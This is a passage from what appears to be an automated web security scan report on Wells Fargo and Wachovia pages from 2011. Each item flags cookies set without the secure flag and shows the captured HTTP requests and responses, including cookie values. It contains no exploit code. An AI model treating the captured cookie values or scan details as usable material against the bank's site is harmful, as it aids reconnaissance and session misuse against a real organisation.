User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:17:33 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=F64AE9222F97102F0FF6CD68BE2C558E; Path=/; Domain=.wachovia.com
Last-Modified: Thu, 20 Jan 2011 00:00:08 GMT
Accept-Ranges: bytes
Cache-Control: max-age=-47845
Expires: Thu, 03 Feb 2011 00:00:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=45
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 26584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wachovia - Person
...[SNIP]...

10.143. https://www.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:19:51 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: JSESSIONID=BC8AFB9D09E6CFB6400171C92F8B73FF;Path=/;Secure
Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

10.144. https://www.wellsfargo.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /about/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:18 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

10.145. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/EFS/WAC1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/EFS/WAC1 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:06 GMT
Content-length: 6663
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=D79A86BB09726090; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=9Y9TNKrNTWk2JnNMkPVnKGhDp2j4zyC9VsGL93xRQLJBhcvhm52p!1650288205; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110203051805545407416; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:06 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1094851594.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.146. https://www.wellsfargo.com/jump/wachovia/insurance/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/insurance/identity

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/insurance/identity HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:06 GMT
Content-length: 6816
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=9E7CC77021B9627A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=r345NKrTV0hcMDLvR0D6nTptLqh61g2NY6WPhxVLl5YGF55KM7NP!-830141515; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-201102030518061747192016; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:06 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1463950346.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.147. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/wachovia/mortgage/firsttimebuyer

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/wachovia/mortgage/firsttimebuyer?dm=DMIWEWACP5 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:04 GMT
Content-length: 5035
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=998C62FFEC92044F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=GRByNKrMn2CzvJwvZT3Qqs6pdW0C4jrh1jglt6kpncGDnHYYw9Cp!-853430660; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWEWACP5; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:18:04 GMT; path=/
Set-Cookie: wfacookie=B-201102030518041994769205; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:04 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=943856650.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.148. https://www.wellsfargo.com/locator/atm/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/atm/search HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:25 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: v1st=217C745260A2991F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: wcmcookieloc=nL1PNKrBL0wGBfhtR4h5Q4xpncFdz2myKbnkQ7MlmFZ0TyyY2KcR!-397408820; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-201102030518251103942443; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:25 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=859970570.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">


<head>

<title>Wells Fargo Locations<
...[SNIP]...

10.149. https://www.wellsfargo.com/mortgage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:13 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:13 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Mortgage Information .
...[SNIP]...

10.150. https://www.wellsfargo.com/mortgage/apply/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/apply/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/apply/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:06 GMT
Content-length: 9767
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:06 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - Ap
...[SNIP]...

10.151. https://www.wellsfargo.com/mortgage/buy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/buy/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/buy/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:20:48 GMT
Content-length: 11844
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:20:48 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - Ho
...[SNIP]...

10.152. https://www.wellsfargo.com/mortgage/locations/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/locations/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/locations/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:15 GMT
Content-type: text/html; charset=ISO-8859-1
X-Cnection: close
Location: https://www.wfhm.com/locations/index.jsp?dm=DMIWEWAC02
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:15 GMT; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wfhm.com/locations/ind
...[SNIP]...

10.153. https://www.wellsfargo.com/mortgage/rates/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/rates/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/rates/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; NSC_XfmmtGbshp4=445b32077863; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:21:00 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:21:00 GMT; path=/
Content-Language: en
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Home Mortgage - To
...[SNIP]...

10.154. https://www.wellsfargo.com/mortgage/refinance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /mortgage/refinance/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgage/refinance/?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/wachovia/mortgage/index?dm=DMIWEWAC02
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:16 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:18:16 GMT; path=/
Content-Length: 12267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Mortgage Refinancing ... Wells
...[SNIP]...

10.155. https://www.wellsfargo.com/tas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/wachovia/mortgage/index?dm=DMIWEWAC02
Origin: https://www.wellsfargo.com
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049; wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; dm=DMIWEWAC02; ISD_WCM_COOKIE=1346509834.16927.0000
Content-Length: 177

RequestType=Logging&pageURL=https%3A//www.wellsfargo.com/wachovia/mortgage/index%3Fdm%3DDMIWEWAC02&pageID=/wachovia/mortgage/index&tz=-360&r=https://www.wachovia.com/&App_ID=WWW

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:05 GMT
Content-type: text/html
Set-cookie: TCID=0007ae71-98bc-bd52-84ae-888500000049;Domain=.wellsfargo.com;Expires=Sat, 02-Feb-2013 13:18:05 GMT;Path=/
Set-cookie: NSC_XfmmtGbshp4=445b32077863;Domain=.wellsfargo.com;Expires=Thu, 03-Feb-2011 17:18:05 GMT;Path=/
Content-Length: 0


10.156. https://www.wellsfargo.com/wachovia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:23 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=CBD6C286D37D50C2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=9hvNNKrff2pv13DmypVr4lVTfNsJfTP1JvR15S1vn8TkzKJ0ndyX!-2146108302; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-201102030518231332837520; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:23 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1648499722.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo and Wachov
...[SNIP]...

10.157. https://www.wellsfargo.com/wachovia/autoloans/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/autoloans/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/autoloans/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:07 GMT
Content-length: 4590
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=B965DA8A5CA67FE6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=Cy8nNKrPS11fYm6SXpppznVZQ17rp91BLhF2hTyJpBCypZg1n0Yl!720006441; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-20110203051807719562312; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:07 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1614945290.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.158. https://www.wellsfargo.com/wachovia/insurance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/insurance

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/insurance HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:09 GMT
Content-length: 5083
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=F9ABF2DBD3379DE1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=YNFZNKrRzR7z1CTMzBGK8QfhZP4cHvwyRx3KLp84T4ht2RGqXt1Y!1501562554; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-201102030518091458514995; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:09 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1497504778.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.159. https://www.wellsfargo.com/wachovia/mortgage/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/mortgage/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/mortgage/index?dm=DMIWEWAC02 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; wfacookie=B-201102021400581302177828; WFHOME=PER; TCID=0007ae71-98bc-bd52-84ae-888500000049

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:01 GMT
Content-length: 5748
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=dcZwNKrJNgvQcRKGLzpGdytBFd2Gb39LnVnzTPHpzy7DGKcT5CvJ!-605001729; domain=.wellsfargo.com; path=/; secure
Set-Cookie: dm=DMIWEWAC02; domain=.wellsfargo.com; expires=Saturday, 05-Mar-2011 13:18:01 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1346509834.16927.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.160. https://www.wellsfargo.com/wachovia/wealthmanagement/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/wealthmanagement/index

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wachovia/wealthmanagement/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:18:20 GMT
Content-length: 4878
Content-type: text/html; charset=UTF-8
Set-Cookie: v1st=BAFB13EBB5A11093; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: wcmcookiewf=fkPGNKrcBBsf0h1ybNSh7LPWfcv1h35wwbw3KGvLHP3bckNb1jYg!-819821412; domain=.wellsfargo.com; path=/; secure
Set-Cookie: wfacookie=B-2011020305182097829883; domain=.wellsfargo.com; expires=Sunday, 31-Jan-2021 13:18:20 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=1296178186.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
